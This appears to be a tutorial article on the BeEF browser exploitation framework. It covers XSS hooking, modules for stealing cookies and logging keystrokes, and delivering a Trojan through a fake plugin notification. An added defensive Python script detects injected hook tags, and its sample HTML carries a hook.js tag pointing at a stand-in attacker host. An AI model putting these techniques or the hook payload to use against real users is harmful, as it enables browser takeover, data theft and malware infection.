BeEF Framework

BeEF is short for The Browser Exploitation Framework. It is a free, professional security tool that focuses on the web browser. It is also an XSS exploitation tool designed to take over a victim’s browser session as part of the exploitation, and it includes different kinds of modules and payloads. The tool gives the experienced penetration tester pioneering techniques and, unlike other tools, concentrates on leveraging browser flaws to check the security posture of a target. BeEF is built only for penetration testing and legal research.

The tool is available for Windows, Linux and Mac OS X operating systems. It is used for collecting browser flaws or zombie browsers in real time. It gives the researcher or the attacker a command and control interface which facilitates the targeting of groups or individuals of zombie browsers. It is built to make the creation of new exploit modules easy.

BeEF Usage Example

The BeEF server can be accessed via any browser on our localhost (127.0.0.1) web server at port 3000. To access its authentication page, go to:

http://localhost:3000/ui/authentication

The default credentials are “beef” for both username and password.

root@kali:~# beef-xss

[*] Please wait as BeEF services are started.

[*] You might need to refresh your browser once it opens.

BeEF JS Injection

Traditionally, the JavaScript hook is injected by the attacker into HTML code through an attack such as Cross-Site Scripting (XSS) or SQL Injection. Once the hook is processed by the browser, it beacons back home to the BeEF server and processes JavaScript-based commands sent from the BeEF server to the client.

The commands sent to the browser are triggered through modules running within the BeEF server. These modules send commands that do everything from fingerprinting browsers and plugins to allowing the attacker to proxy web traffic through the browser. Additional modules exist to perform tasks such as network scanning, browser keystroke logging, and cross-protocol exploitation, where HTTP requests can be sent to non-HTTP services with exploit payloads that will execute and return shells back to an attacker.
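
From the defender's side, the injected hook shows up as a script element that loads from a host the page has no reason to use. The following is an added example, not part of the original article or of BeEF: a Python check that audits a response body for such script tags. The site name, allowlist and sample HTML are constructed assumptions; port 3000 is the BeEF port given above and /hook.js is BeEF's default hook file name.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumed for this sketch: the page URL and the hosts it may load scripts from.
PAGE_URL = "https://shop.example/search?q=shoes"
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}


class ScriptAuditor(HTMLParser):  # records <script src=...> outside the allowlist
    def __init__(self, page_url, allowed_hosts):
        super().__init__()
        self.page_url, self.allowed_hosts = page_url, allowed_hosts
        self.findings = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag == "script" else None
        if not src:
            return  # not a script, or an inline script (out of scope here)
        try:
            url = urlsplit(urljoin(self.page_url, src.strip()))
            host, port = url.hostname, url.port
        except ValueError:  # malformed URL in hostile input: report it as-is
            self.findings.append((src, ["unparseable script URL"]))
            return
        if host in self.allowed_hosts:
            return
        reasons = ["script host not on allowlist"]
        if port == 3000:  # BeEF server port given on this page
            reasons.append("port 3000 (BeEF default)")
        if url.path.lower().endswith("/hook.js"):  # BeEF's default hook file name
            reasons.append("default BeEF hook path")
        self.findings.append((url.geturl(), reasons))


def audit_html(html, page_url=PAGE_URL, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return [(script_url, [reasons])] for scripts loaded from unexpected hosts."""
    auditor = ScriptAuditor(page_url, allowed_hosts)
    auditor.feed(html)
    return auditor.findings


# Constructed sample response: a reflected search term carrying an injected tag.
SAMPLE_HTML = """<html><head><script src="/static/app.js"></script>
<script src="https://cdn.shop.example/lib.js"></script></head><body>
<p>Results for: <script src="http://203.0.113.7:3000/hook.js"></script></p></body></html>"""

if __name__ == "__main__":
    for url, reasons in audit_html(SAMPLE_HTML):
        print(url, "->", "; ".join(reasons))
```

The same allowlist, expressed as a Content-Security-Policy script-src directive, lets the browser refuse the injected script instead of only reporting it.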

What we can do with BeEF Tool

After hooking the victim’s browser, we can use numerous built-in commands that can be executed from the victim’s browser. Below are just a few examples; there are many others.

  • Get Visited Domains
  • Get Visited URLs
  • Webcam
  • Get All Cookies
  • Grab Google Contacts
  • Screenshot

In the Social Engineering example below, I selected the “Fake Notification Bar (chrome)” command, which is very powerful for sending the victim a Trojan that I created. As you can see, when I execute this command, an “Additional plugins are required” box pops up on the user’s screen, telling them to “Install Missing Plugins”. If they click it, the Trojan is downloaded to the user’s computer, and the user runs it (because the user thinks it is additional plugins). After the user runs the .exe file, the Trojan infects the computer and opens a session on the attacker’s computer to get into the user’s computer.